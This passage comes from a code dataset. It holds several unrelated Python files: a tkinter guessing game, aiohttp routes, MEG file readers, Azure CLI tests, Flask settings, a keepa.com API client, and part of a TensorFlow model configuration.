\"\"\"\r\n\t\t\r\n\t\t# create instruction label\r\n\t\tLabel(self,\r\n\t\t text = \"Welcome to 'Guess My Number'!\"\r\n\t\t ).grid(row = 0, column = 0, columnspan = 2, sticky = W)\r\n\t\tLabel(self,\r\n\t\t text = \"I'm thinking of a number between 1 and 100.\"\r\n\t\t ).grid(row = 1, column = 0, columnspan = 2, sticky = W)\r\n\t\tLabel(self,\r\n\t\t text = \"Try to guess it in as few attempts as possible.\"\r\n\t\t ).grid(row = 2, column = 0, columnspan = 2, sticky = W)\r\n\t\t\r\n\t\t# making python/tkinter label widget update with attempts left\r\n\t\tself.attempts = StringVar()\r\n\t\tLabel(self,\r\n\t\t textvariable = self.attempts,\r\n\t\t ).grid(row = 3, column = 0, columnspan = 2, sticky = W)\r\n\t\tself.attempts.set(\"You have \" + str(self.limit_try - self.tries) + \" attempts\") \r\n\r\n\t\t# create a label and text entry for a player's guess\r\n\t\tLabel(self,\r\n\t\t\t text = \"Take a guess: \"\r\n\t\t\t ).grid(row = 4, column = 0, sticky = W)\r\n\t\tself.guess_ent = Entry(self)\r\n\t\tself.guess_ent.grid(row = 4, column = 1, sticky = W)\r\n\t\t\r\n\t\t# making python/tkinter label widget update with status input check\r\n\t\tself.response = StringVar()\r\n\t\tLabel(self,\r\n\t\t textvariable = self.response,\r\n\t\t ).grid(row = 5, column = 0, columnspan = 2, sticky = W)\r\n\t\tself.response.set(\"Input integer number between 1 and 100\") \r\n\t\r\n\t\t# create a submit button\r\n\t\tButton(self,\r\n\t\t\t text = \"Check the guess\",\r\n\t\t\t command = self.check_guess\r\n\t\t\t ).grid(row = 4, column = 2, sticky = W)\r\n\r\n\t\tself.status_txt = Text(self, width = 125, height = 10, wrap = WORD)\r\n\t\tself.status_txt.grid(row = 6, column = 0, columnspan = 4)\r\n\t\t\r\n\r\n\t\r\n\t\r\n\tdef check_guess(self):\r\n\t\t\"\"\" Fill status text box with responce based on user guess. \"\"\"\r\n\t\t# get values from the GUI\r\n\t\tguess = self.guess_ent.get()\r\n\t\tif guess not in self.options_pool :\r\n\t\t\tself.response.set(\"Wrong value. 
It must be integer number\" +\r\n\t\t\t\" from 1 to 100. Try again\")\r\n\t\telse :\r\n\t\t\tif self.win == 0:\r\n\t\t\t\tself.tries += 1\r\n\t\t\t\tself.response.set(\"\")\r\n\t\t\t\tif guess != self.the_number and self.tries <= self.limit_try:\r\n\t\t\t\t\tself.status_txt.insert(0.0, guess)\r\n\t\t\t\t\tself.attempts.set(\"You have \" + str(self.limit_try - self.tries) + \" attempts\")\r\n\t\t\t\t\tif guess > self.the_number:\r\n\t\t\t\t\t\tself.status_txt.insert(0.0, \"\\nLower...\")\r\n\t\t\t\t\telse:\r\n\t\t\t\t\t\tself.status_txt.insert(0.0, \"\\nHigher...\")\r\n\t\t\t\telif self.tries > self.limit_try:\r\n\t\t\t\t\tself.win = 1\r\n\t\t\t\t\tself.response.set(\"You have used all attempts or guessed the number, restart game's window\" )\r\n\t\t\t\t\tself.status_txt.insert(0.0, \"\\nWell, you'll be lucky next time.\")\r\n\t\t\t\t\tself.status_txt.insert(0.0, \"\\nThe number was \" + self.the_number)\r\n\t\t\t\t\tself.status_txt.insert(0.0, \"\\nRestart game's window for another game.\")\r\n\t\t\t\telif guess == self.the_number and self.tries <= self.limit_try :\r\n\t\t\t\t\tself.status_txt.insert(0.0, \"\\nYou guessed it! 
The number was \" + self.the_number)\r\n\t\t\t\t\tself.status_txt.insert(0.0, \"\\nRestart game's window for another game.\")\r\n\t\t\t\t\tself.win = 1\r\n\r\n\r\nif __name__ == \"__main__\":\r\n\troot = Tk()\r\n\troot.title(\"Guess Number GUI\")\r\n\tapp = Application(root)\r\n\troot.mainloop()","sub_path":"Small_training_Games/guess_number_GUI.py","file_name":"guess_number_GUI.py","file_ext":"py","file_size_in_byte":3746,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"405872894","text":"from views import Handler\nfrom aiohttp import web\n\n\ndef set_routes(app):\n \"\"\" Set routes, mechanism of mapping the URL directly to the code\"\"\"\n handler = Handler()\n\n app.router.add_route('GET', '/', handler.index)\n app.router.add_get('/message', handler.get_message)\n app.router.add_get('/connect', handler.connect_to_server)\n","sub_path":"0.1_PYTHON_DOCKER/gateway/api/routes.py","file_name":"routes.py","file_ext":"py","file_size_in_byte":341,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"215879842","text":"# uncompyle6 version 3.7.4\n# Python bytecode 3.5 (3351)\n# Decompiled from: Python 3.6.9 (default, Apr 18 2020, 01:56:04) \n# [GCC 8.4.0]\n# Embedded file name: /usr/local/lib/python3.5/dist-packages/megdata/bti_process.py\n# Compiled at: 2018-10-24 06:01:48\n# Size of source mod 2**32: 7447 bytes\nimport os, time\nfrom .common import *\n\nclass BTIUserProcessHeader(object):\n\n @classmethod\n def from_fd(cls, fd):\n ret = cls()\n ret.nbytes = megdata_read_int32(fd)\n ret.processtype = megdata_read_str(fd, 20)\n ret.checksum = megdata_read_int32(fd)\n return ret\n\n def str_indent(self, indent=0):\n s = ' ' * indent + '\\n'\n return s\n\n def __str__(self):\n return self.str_indent()\n\n\nclass BTIGenUserProcess(object):\n\n @classmethod\n def from_fd(cls, fd):\n ret = cls()\n ret.user_space_size = megdata_read_int32(fd)\n os.lseek(fd, 32, 
os.SEEK_CUR)\n ret.user_data = os.read(fd, ret.user_space_size)\n return ret\n\n def str_indent(self, indent=0):\n s = ' ' * indent + '\\n'\n return s\n\n def __str__(self):\n return self.str_indent()\n\n\nclass BTINoiseProcess(object):\n\n @classmethod\n def from_fd(cls, fd):\n ret = cls()\n ret.user_space_size = megdata_read_int32(fd)\n os.lseek(fd, 32, os.SEEK_CUR)\n ret.noise = megdata_read_double(fd, count=ret.user_space_size / 8)\n return ret\n\n def str_indent(self, indent=0):\n s = ' ' * indent + '\\n'\n return s\n\n def __str__(self):\n return self.str_indent()\n\n\nclass BTIFilterProcess(object):\n\n @classmethod\n def from_fd(cls, fd):\n ret = cls()\n ret.frequency = megdata_read_float(fd)\n os.lseek(fd, 32, os.SEEK_CUR)\n return ret\n\n def str_indent(self, indent=0):\n s = ' ' * indent + '\\n'\n return s\n\n def __str__(self):\n return self.str_indent()\n\n\nclass BTIBandFilterProcess(object):\n\n @classmethod\n def from_fd(cls, fd):\n ret = cls()\n ret.high_freq = megdata_read_float(fd)\n ret.low_freq = megdata_read_float(fd)\n os.lseek(fd, 32, os.SEEK_CUR)\n return ret\n\n def str_indent(self, indent=0):\n s = ' ' * indent + '\\n'\n return s\n\n def __str__(self):\n return self.str_indent()\n\n\nclass BTIDefaultProcess(object):\n\n @classmethod\n def from_fd(cls, fd):\n ret = cls()\n ret.scaleoption = megdata_read_int32(fd)\n os.lseek(fd, 4, os.SEEK_CUR)\n ret.scale = megdata_read_double(fd)\n ret.dtype = megdata_read_int32(fd)\n ret.selected = megdata_read_int16(fd)\n ret.colordisplay = megdata_read_int16(fd)\n os.lseek(fd, 32, os.SEEK_CUR)\n return ret\n\n def str_indent(self, indent=0):\n s = ' ' * indent + '\\n'\n return s\n\n def __str__(self):\n return self.str_indent()\n\n\nclass BTIUserProcess(object):\n\n @classmethod\n def from_fd(cls, fd, bti_def=False):\n ret = cls()\n ret.hdr = BTIUserProcessHeader.from_fd(fd)\n if bti_def:\n ret.data = BTIDefaultProcess.from_fd(fd)\n else:\n if ret.hdr.processtype in ('b_filt_hp', 'b_filt_lp', 
'b_filt_notch'):\n ret.data = BTIFilterProcess.from_fd(fd)\n else:\n if ret.hdr.processtype in ('b_filt_b_pass', 'b_filt_b_reject'):\n ret.data = BTIBandFilterProcess.from_fd(fd)\n else:\n if ret.hdr.processtype in ('b_noise', ):\n ret.data = BTINoiseProcess.from_fd(fd)\n else:\n ret.data = BTIGenUserProcess.from_fd(fd)\n return ret\n\n def str_indent(self, indent=0):\n s = ' ' * indent + '\\n'\n return s\n\n def __str__(self):\n return self.str_indent()\n\n\nclass BTIProcess(object):\n\n @classmethod\n def from_fd(cls, fd, processes=None):\n ret = cls()\n ret.hdr = BTIUserProcessHeader.from_fd(fd)\n ret.user = megdata_read_str(fd, 32)\n ret.timestamp = megdata_read_int32(fd)\n ret.filename = megdata_read_str(fd, 256)\n ret.total_steps = megdata_read_int32(fd)\n os.lseek(fd, 32, os.SEEK_CUR)\n curpos = os.lseek(fd, 0, os.SEEK_CUR)\n if curpos % 8 != 0:\n os.lseek(fd, 8 - curpos % 8, os.SEEK_CUR)\n ret.steps = []\n for s in range(ret.total_steps):\n if ret.hdr.processtype == 'BTi_defaults':\n st = BTIUserProcess.from_fd(fd, bti_def=True)\n else:\n st = BTIUserProcess.from_fd(fd)\n ret.steps.append(st)\n curpos = os.lseek(fd, 0, os.SEEK_CUR)\n if curpos % 8 != 0:\n os.lseek(fd, 8 - curpos % 8, os.SEEK_CUR)\n\n return ret\n\n def str_indent(self, indent=0):\n s = ' ' * indent + '\\n'\n return s\n\n def __str__(self):\n return self.str_indent()","sub_path":"pycfiles/megdata-1.0.3.linux-x86_64.tar/bti_process.cpython-35.py","file_name":"bti_process.cpython-35.py","file_ext":"py","file_size_in_byte":6836,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"205372044","text":"# --------------------------------------------------------------------------------------------\n# Copyright (c) Microsoft Corporation. All rights reserved.\n# Licensed under the MIT License. 
See License.txt in the project root for license information.\n# --------------------------------------------------------------------------------------------\n\nimport unittest\n\n\nclass TestAAZHttpOperation(unittest.TestCase):\n\n def test_aaz_http_operation_serialize_content(self):\n from azure.cli.core.aaz._field_type import AAZObjectType, AAZListType, AAZDictType, AAZStrType, AAZIntType\n from azure.cli.core.aaz._operation import AAZHttpOperation\n\n # test required Case 1\n schema = AAZObjectType(flags={\"required\": True})\n schema.properties = AAZObjectType(flags={\"required\": True})\n\n v = schema._ValueCls(schema=schema, data=schema.process_data(None))\n data = AAZHttpOperation.serialize_content(v)\n self.assertEqual(data, {\"properties\": {}})\n\n schema.properties.prop1 = AAZListType(flags={\"required\": True})\n schema.properties.prop2 = AAZDictType(flags={\"required\": True}, serialized_name='property2')\n\n schema.properties.prop3 = AAZObjectType()\n schema.properties.prop4 = AAZObjectType(flags={\"required\": True, \"read_only\": True})\n schema.properties.prop5 = AAZDictType(flags={\"required\": True, \"read_only\": True}, serialized_name='Prop5')\n schema.properties.prop6 = AAZListType(flags={\"required\": True, \"read_only\": True})\n\n v = schema._ValueCls(schema=schema, data=schema.process_data(None))\n data = AAZHttpOperation.serialize_content(v)\n self.assertEqual(data, {\"properties\": {'prop1': [], \"property2\": {}}})\n\n # test required Case 2\n schema = AAZObjectType(flags={\"required\": True})\n schema.properties = AAZObjectType()\n schema.properties.prop1 = AAZListType(flags={\"required\": True})\n schema.properties.prop2 = AAZDictType(flags={\"required\": True})\n schema.properties.prop3 = AAZObjectType()\n schema.properties.prop3.sub1 = AAZIntType(serialized_name=\"subProperty1\")\n schema.properties.prop4 = AAZStrType(flags={\"required\": True, \"read_only\": True})\n\n v = schema._ValueCls(schema=schema, 
data=schema.process_data(None))\n data = AAZHttpOperation.serialize_content(v)\n self.assertEqual(data, {})\n\n v = schema._ValueCls(schema=schema, data=schema.process_data(None))\n v.properties.prop3.sub1 = 6\n self.assertTrue(v._is_patch)\n data = AAZHttpOperation.serialize_content(v)\n self.assertEqual(data, {'properties': {'prop3': {'subProperty1': 6}, 'prop1': [], 'prop2': {}}})\n\n schema.properties.prop3.sub2 = AAZStrType(flags={\"required\": True})\n v = schema._ValueCls(schema=schema, data=schema.process_data(None))\n v.properties.prop3.sub1 = 6\n with self.assertRaises(ValueError):\n AAZHttpOperation.serialize_content(v)\n\n\nclass TestAAZGenericUpdateOperation(unittest.TestCase):\n\n def test_aaz_generic_update_operation(self):\n from azure.cli.core.aaz._field_type import AAZObjectType, AAZListType, AAZDictType, AAZStrType, AAZIntType\n from azure.cli.core.aaz._operation import AAZGenericInstanceUpdateOperation\n\n schema = AAZObjectType()\n schema.props = AAZObjectType()\n schema.props.i = AAZIntType()\n schema.props.s = AAZStrType()\n schema.props.l = AAZListType()\n schema.props.l.Element = AAZObjectType()\n schema.props.l.Element.s = AAZStrType()\n schema.props.l2 = AAZListType()\n schema.props.l2.Element = AAZIntType()\n schema.props.d = AAZDictType()\n schema.props.d.Element = AAZObjectType()\n schema.props.d.Element.s = AAZStrType()\n schema.props.d2 = AAZDictType()\n schema.props.d2.Element = AAZStrType()\n\n instance = schema._ValueCls(schema=schema, data=schema.process_data({\n \"props\": {\n \"i\": 123,\n \"s\": \"abc\",\n \"l\": [\n {\n \"s\": \"la\"\n },\n {\n \"s\": \"lb\"\n },\n {\n \"s\": \"lc\"\n }\n ],\n \"d\": {\n \"a\": {\n \"s\": \"da\"\n },\n \"b\": {\n \"s\": \"db\"\n },\n \"c\": {\n \"s\": \"dc\"\n }\n }\n }\n }))\n\n AAZGenericInstanceUpdateOperation._update_instance_by_generic(\n instance,\n {\n \"actions\": [\n (\"set\", [\"props.i=666\"]),\n (\"set\", [\"props.s=sss\"]),\n (\"set\", [\"props.l[2].s='l2'\"]),\n (\"set\", 
[\"props.l2=[123,123]\"]),\n (\"set\", [\"props.d.c.s='d2'\"]),\n (\"set\", [\"props.d.e={'s':'d3'}\"]),\n (\"set\", [\"props.d2={'a':'123','b':'1234'}\"]),\n ]\n }\n )\n\n self.assertEqual(instance.props.i, 666)\n self.assertEqual(instance.props.s, \"sss\")\n self.assertEqual(instance.props.l[2].s, 'l2')\n self.assertEqual(instance.props.l2, [123,123])\n self.assertEqual(instance.props.d['c'].s, 'd2')\n self.assertEqual(instance.props.d['e'], {'s':'d3'})\n self.assertEqual(instance.props.d2, {'a':'123','b':'1234'})\n\n AAZGenericInstanceUpdateOperation._update_instance_by_generic(\n instance,\n {\n \"force_string\": True,\n \"actions\": [\n (\"set\", [\"props.s=666\"]),\n (\"set\", [\"props.l[2].s=2\"]),\n (\"set\", [\"props.d.c.s=3\"]),\n ]\n }\n )\n self.assertEqual(instance.props.s, \"666\")\n self.assertEqual(instance.props.l[2].s, '2')\n self.assertEqual(instance.props.d['c'].s, '3')\n\n AAZGenericInstanceUpdateOperation._update_instance_by_generic(\n instance,\n {\n \"actions\": [\n (\"add\", [\"props.l\", \"{'s':'add_l'}\"]),\n ]\n }\n )\n self.assertEqual(instance.props.l[3], {'s':'add_l'})\n\n AAZGenericInstanceUpdateOperation._update_instance_by_generic(\n instance,\n {\n \"actions\": [\n (\"remove\", [\"props.l\", \"3\"]),\n (\"remove\", [\"props.l2\"]),\n (\"remove\", [\"props.d2\"]),\n (\"remove\", [\"props.d.e\"]),\n ]\n }\n )\n\n self.assertEqual(len(instance.props.l), 3)\n self.assertEqual(instance.props.l2, [])\n self.assertEqual(instance.props.d2, {})\n self.assertEqual(len(instance.props.d), 3)\n","sub_path":"src/azure-cli-core/azure/cli/core/tests/test_aaz_operation.py","file_name":"test_aaz_operation.py","file_ext":"py","file_size_in_byte":6956,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"234967096","text":"\"\"\"\n[This file contains various environment variables used by Flask]\n\"\"\"\n\n# Flask settings\nFLASK_SERVER_HOST = \"0.0.0.0\"\nFLASK_SERVER_PORT = 8000\nFLASK_DEBUG = True 
# Do not use debug mode in production\nFLASK_TESTING = True # Allows for auto reloading\nFLASK_ENV = \"development\"\n# Flask-Restplus settings\nRESTPLUS_SWAGGER_UI_DOC_EXPANSION = \"list\"\nRESTPLUS_VALIDATE = True\nRESTPLUS_MASK_SWAGGER = False\nRESTPLUS_ERROR_404_HELP = False\nTEMPLATE_DIR = \"web/templates\"\nSTATIC_DIR = \"web/static\"\n","sub_path":"srv/settings.py","file_name":"settings.py","file_ext":"py","file_size_in_byte":493,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"551461540","text":"# -*- coding: utf-8 -*-\n\"\"\"\nInterface module to download Amazon product and history data from keepa.com\n\n\"\"\"\n\n# Standard library\nimport logging\n\n# for IPython\ntry:\n reload(logging)\nexcept:\n pass\n\nimport time\nimport threading\n\n# Other libraries\nimport requests\nimport numpy as np\n\n# This module\nfrom keepaAPI import keepaTime\n\n# Disable logging in requests module\nlogging.getLogger(\"requests\").setLevel(logging.ERROR)\nlogging.getLogger(\"urllib3\").setLevel(logging.ERROR)\n\n\n# Request limit\nreqlim = 100\n\n# Status code dictionary/key\nscodes = {'400': 'REQUEST_REJECTED',\n '402': 'PAYMENT_REQUIRED',\n '405': 'METHOD_NOT_ALLOWED',\n '429': 'NOT_ENOUGH_TOKEN'}\n\ndcodes = ['RESERVED', 'US', 'GB', 'DE', 'FR', 'JP', 'CA', 'CN', 'IT', 'ES', 'IN', 'MX']\n\n\ndef ThreadRequest(asins, settings, products, sema, err):\n \"\"\"\n Function to send query to keepa and store results\n\n Supports threads\n \n \"\"\"\n\n # Attempt request\n try:\n try:\n response = ProductQuery(asins, settings)\n products.extend(response['products'])\n except Exception as e:\n logging.warning('Exception {:s} in thread. 
Waiting 60 seconds for retry.'.format(e))\n time.sleep(60)\n \n # Try again\n response = ProductQuery(asins, settings)\n products.extend(response['products'])\n \n except:\n # Track error\n err = True\n\n # Log\n if not err:\n logging.info('Completed {:d} ASIN(s)'.format(len(products)))\n else:\n logging.err('Request failed')\n \n # finally, release thread\n sema.release()\n \n\ndef GetUserStatus(accesskey):\n \"\"\" Queries keepa for available tokens \"\"\"\n \n url = 'https://api.keepa.com/token/?key={:s}'.format(accesskey)\n r = requests.get(url)\n status_code = r.status_code\n \n # Return parsed response if successful\n if status_code == 200:\n response = r.json()\n return response\n\n elif str(status_code) in scodes:\n raise Exception(scodes[str(status_code)])\n else:\n raise Exception('REQUEST_FAILED')\n\n\nclass UserStatus(object):\n \"\"\" Object to track and store user status on keepa locally \"\"\"\n \n def __init__(self, accesskey):\n \"\"\" Initialize user status using server side info \"\"\"\n self.accesskey = accesskey\n self.UpdateFromServer()\n\n\n def UpdateFromServer(self):\n \"\"\" Update user status from server \"\"\"\n self.status = GetUserStatus(self.accesskey)\n \n \n def LocalUpdate(self):\n \"\"\"\n Update the local user status using existing timestamp and refill rate\n \"\"\"\n \n # Get current timestamp in miliseconds from unix epoch\n t = int(time.time()*1000)\n\n # Number of times refill has occured\n lstrefil = self.status['timestamp'] - (60000 - self.status['refillIn'])\n nrefil = (t - lstrefil)/60000.0\n\n if nrefil > 1:\n self.status['tokensLeft'] += self.status['refillRate']*int(nrefil)\n \n if self.status['tokensLeft'] > 60*self.status['refillRate']:\n self.status['tokensLeft'] = 60*self.status['refillRate']\n\n # Update timestamps\n self.status['timestamp'] = t\n self.status['refillIn'] = int((1 - nrefil % 1)*60000)\n\n\n def RemoveTokens(self, tokens):\n \"\"\" Remove tokens from tokensLeft to track requests to server \"\"\"\n 
self.LocalUpdate()\n self.status['tokensLeft'] -= tokens\n\n\n def RemainingTokens(self):\n \"\"\" Returns the tokens remaining to the user \"\"\"\n return self.status['tokensLeft']\n \n \n def TimeToRefill(self, ):\n \"\"\" Returns the time to refill in seconds \"\"\"\n # Get current timestamp in miliseconds from unix epoch\n now = int(time.time()*1000)\n timeatrefile = self.status['timestamp'] + self.status['refillIn']\n \n timetorefil = timeatrefile - now + 1000 # plus one second fudge factor\n if timetorefil < 0:\n timetorefil = 0\n \n # Return value in seconds\n return timetorefil/1000.0\n\n\n def UpdateFromResponse(self, response):\n \"\"\" Updates user status from response \"\"\"\n for key in self.status:\n self.status[key] = response[key]\n\n\ndef ProductQuery(asins, settings):\n \"\"\"\n Sends query to keepa API and returns parsed JSON result\n \n INPUTS\n \n Required:\n asins (np.ndarray)\n Array of ASINs. Must be between 1 and 100 ASINs\n settings (dictonary) containing: \n\n accesskey: (string)\n keepa access key string\n\n domain: (string)\n One of the following Amazon domains:\n RESERVED, US, GB, DE, FR, JP, CA, CN, IT, ES, IN, MX\n \n offers (bool default False)\n Adds product offers to product data\n\n update (int default None)\n If data is older than the input interger, keepa will update\n their database and return live data. If set to 0 (live data),\n then request may cost an additional token\n\n history (bool default True)\n When set to True includes the price, sales, and offer history\n of a product. Set to False to reduce request time if data is\n not required\n \n OUTPUTS\n Response, if successful, will contain the following fields\n n\n\n products\n Dictionary of product data. Length equal to number of successful\n ASINs\n\n refillIn\n Time in miliseconds to the next refill of tokens\n\n refilRate\n Number of tokens refilled per minute\n\n timestamp\n \n tokensLeft\n Remaining tokens\n\n tz\n Timezone. 
0 is UTC\n \n \"\"\"\n \n # ASINs convert to comma joined string\n nitems = len(asins)\n if nitems > 100:\n raise Exception('Too many items in product query')\n asinstr = ','.join(asins) \n \n # Assemble and send request\n # Accepts gzip encoding and defaults with no cache\n payload = {'key': settings['accesskey'],\n 'domain': dcodes.index(settings['domain']), \n 'asin': asinstr}\n\n if settings['offers']:\n payload['offers'] = settings['offers']\n \n if settings['update'] != None:\n payload['update'] = int(settings['update'])\n \n if not settings['history']:\n payload['history'] = 0\n \n r = requests.get('https://api.keepa.com/product/?', params=payload)\n status_code = r.status_code\n\n # Return parsed response if successful\n if status_code == 200:\n # Parse JSON response\n response = r.json()\n \n # Replace csv with parsed data if history enabled\n if settings['history']:\n for product in response['products']:\n if product['csv']: # if data exists\n product['data'] = ParseCSV(product['csv'], settings['to_datetime'])\n del product['csv']\n \n return response\n\n elif str(status_code) in scodes:\n raise Exception(scodes[str(status_code)])\n \n else:\n raise Exception('REQUEST_FAILED')\n\n\ndef ParseCSV(csv, to_datetime):\n \"\"\"\n \n Parses csv list from keepa into a python dictionary\n \n csv is organized as the following\n index item\n 0 Amazon Price\n 1 Marketplace New\n 2 Marketplace Used\n 3 Sales Rank\n 4 Listing Price\n 5 Collectable Price\n 11 New Offers\n 12 Used Offers\n 14 Collectable Offers\n \n \n \"\"\"\n \n # index in csv, key name, isfloat (is price)\n indices = [[0, 'AmazonPrice', True],\n [1, 'MarketplaceNew', True],\n [2, 'MarketplaceUsed', True],\n [3, 'SalesRank', False],\n [4, 'ListingPrice', True],\n [5, 'CollectablePrice', True],\n [11, 'NewOffers', False],\n [12, 'UsedOffers', False],\n [14, 'CollectableOffers', False]]\n\n\n product_data = {}\n \n for index in indices:\n # Check if it exists\n ind = index[0]\n if csv[ind]:\n key = 
index[1]\n \n # Data goes [time0, value0, time1, value1, ...]\n product_data[key + '_time'] = keepaTime.KeepaMinutesToTime(csv[ind][::2], to_datetime)\n\n # Convert to float price if applicable\n if index[2]:\n product_data[key] = np.array(csv[ind][1::2], np.float)/100.0\n else:\n product_data[key] = np.asarray(csv[ind][1::2])\n\n return product_data\n\n\ndef CheckASINs(asins):\n \"\"\" Checks if the input ASINs are valid and formats them \"\"\"\n if isinstance(asins, list) or isinstance(asins, np.ndarray):\n return np.unique(asins)\n\n elif isinstance(asins, str) or isinstance(asins, unicode):\n if len(asins) != 10:\n return np.array([])\n else:\n return np.asarray([asins])\n\n#==============================================================================\n# Main API\n#==============================================================================\nclass API(object):\n \"\"\" Class to support html interface to keepa server \"\"\"\n \n def __init__(self, accesskey):\n \"\"\" Initializes API \"\"\"\n \n # Disable logging (except for warnings) for requests module \n# logging.getLogger(\"requests\").setLevel(logging.WARNING)\n\n # Create logger\n logstr = '%(levelname)-7s: %(message)s'\n logging.basicConfig(format=logstr, level='DEBUG', filename='')\n logging.info('Connecting to keepa using key {:s}'.format(accesskey))\n\n # Store access key\n self.accesskey = accesskey\n\n # Store user's available tokens\n self.user = UserStatus(self.accesskey)\n logging.info('{:d} tokens remain'.format(self.user.RemainingTokens()))\n\n\n def WaitForTokens(self, updatetype='server'):\n \"\"\"\n Checks local user status for any remaining tokens and waits if none are\n available\n \n \"\"\"\n \n if updatetype=='server':\n # Perform server update\n self.user.UpdateFromServer()\n else:\n # Perform local update\n self.user.LocalUpdate()\n\n # Wait if no tokens available\n if self.user.RemainingTokens() <= 0:\n tdelay = self.user.TimeToRefill()\n logging.info('Waiting {:.2f} seconds for 
additional tokens'.format(tdelay))\n time.sleep(tdelay)\n self.user.LocalUpdate()\n\n\n def ProductQuery(self, asins, domain='US', history=True, offers=False,\n update=None, nthreads=4, to_datetime=True):\n \"\"\"\n Performs a product query of a list, array, or single ASIN. Returns a\n list of product data with one entry for each product.\n \n INPUTS:\n asins (required string list np.ndarray)\n A list, array, or single ASIN. Each ASIN should be 10\n characters and match a product on Amazon. ASINs not matching\n Amazon product or duplicate ASINs will return no data.\n \n domain: (optional string)\n One of the following Amazon domains:\n RESERVED, US, GB, DE, FR, JP, CA, CN, IT, ES, IN, MX\n \n offers (optional bool default False)\n Adds product offers to product data\n\n update (optional int default None)\n If data is older than the input interger, keepa will update\n their database and return live data. If set to 0 (live data),\n then request may cost an additional token\n\n history (optional bool default True)\n When set to True includes the price, sales, and offer history\n of a product. Set to False to reduce request time if data is\n not required\n \n nthreads (optional int default 4)\n Number of threads to interface to keepa with. 
More threads\n means potentially faster batch response, but more bandwidth.\n Probably should be kept under 20.\n \n \"\"\"\n # Format asins into numpy array\n try:\n asins = CheckASINs(asins)\n except:\n raise Exception('Invalid ASIN input')\n\n nitems = len(asins)\n if nitems == 1:\n logging.info('EXECUTING SINGLE PRODUCT QUERY'.format(nitems))\n else:\n logging.info('EXECUTING {:d} ITEM PRODUCT QUERY'.format(nitems))\n\n # Update user status and determine if there any tokens available\n self.user.UpdateFromServer()\n \n # Assemble settings\n settings = {'domain': domain,\n 'accesskey': self.accesskey,\n 'offers': offers,\n 'update': None,\n 'history': history,\n 'to_datetime': to_datetime}\n \n # Report time to completion\n tcomplete = float(nitems - self.user.RemainingTokens())/self.user.status['refillRate'] - (60000 - self.user.status['refillIn'])/60000.0\n if tcomplete < 0.0:\n tcomplete = 0.5\n logging.info('Estimated time to complete {:d} querie(s) is {:.2f} minutes'.format(len(asins), tcomplete))\n logging.info('\\twith a refill rate of {:d} token(s) per minute'.format(self.user.status['refillRate']))\n\n # initialize product and thread lists\n products = []\n threads = []\n \n # Error tracking\n err = False \n \n # Create thread pool\n sema = threading.BoundedSemaphore(value=nthreads)\n \n # Number of requests is dependent on the number of items and request limit\n # Use available tokens first\n idx = 0 # or number complete\n while idx < nitems:\n\n # listen for error\n if err:\n raise Exception ('Error in thread')\n\n # Check and then wait for tokens if applicable\n self.WaitForTokens('local')\n \n nrequest = nitems - idx\n if nrequest > self.user.RemainingTokens():\n nrequest = self.user.RemainingTokens()\n if nrequest > reqlim:\n nrequest = reqlim\n \n # Increment, assemble request, and update available tokens\n asin_request = asins[idx:idx + nrequest]\n idx += nrequest\n self.user.RemoveTokens(nrequest)\n \n # Request data from server\n # Assemble 
partial array of ASINs for this request\n sema.acquire() # Limit to nthreads. Wait if requesting more\n t = threading.Thread(target=ThreadRequest, args=(asin_request,\n settings,\n products, sema,\n err))\n t.start()\n threads.append(t)\n \n # Wait for all threads to complete before returning products\n for t in threads:\n t.join()\n\n return products\n\n \n\n\n \n ","sub_path":"keepaAPI/Interface.py","file_name":"Interface.py","file_ext":"py","file_size_in_byte":15418,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"81480583","text":"import tensorflow as tf\nimport config\n\nfrom model_utils import calculate_conv_output_size\n\n\nn_x = config.IMAGE_PXL_SIZE_X\nn_y = config.IMAGE_PXL_SIZE_Y\nn_z = config.SLICES\n\n# This handles padding in both convolution and pooling layers\nstrides = [[1, 1, 1],\n [2, 4, 4],\n [1, 1, 1],\n [2, 2, 2],\n [1, 1, 1],\n [2, 2, 2]]\n\nfilters = [[3, 5, 5],\n [3, 5, 5],\n [3, 3, 3],\n [3, 3, 3],\n [3, 3, 3],\n [3, 3, 3]]\n \npadding_types = ['VALID'] * 6\n\n\nbaseline_config = {\n 'weights': [\n # Convolution layers\n ('wc1', tf.truncated_normal([3, 5, 5, config.NUM_CHANNELS, 16], stddev=0.01)),\n ('wc2', tf.truncated_normal([3, 3, 3, 16, 32], stddev=0.01)),\n ('wc3', tf.truncated_normal([3, 3, 3, 32, 32], stddev=0.01)),\n # Fully connected layers\n ('wd1', tf.truncated_normal([calculate_conv_output_size(n_x, n_y, n_z, \n strides, \n filters,\n padding_types, \n 32), \n 100], stddev=0.01)),\n ('wout', tf.truncated_normal([100, config.N_CLASSES], stddev=0.01))\n ],\n 'biases': [\n # Convolution layers\n ('bc1', tf.zeros([16])),\n ('bc2', tf.constant(1.0, shape=[32])),\n ('bc3', tf.zeros([32])),\n # Fully connected layers\n ('bd1', tf.constant(1.0, shape=[100])),\n ('bout', tf.constant(1.0, shape=[config.N_CLASSES]))\n ],\n 'pool_strides': [\n [1, 2, 4, 4, 1],\n [1, 2, 2, 2, 1],\n [1, 2, 2, 2, 1],\n ],\n 'pool_windows': [\n [1, 3, 5, 5, 1],\n [1, 3, 3, 3, 1],\n [1, 3, 3, 3, 1],\n 
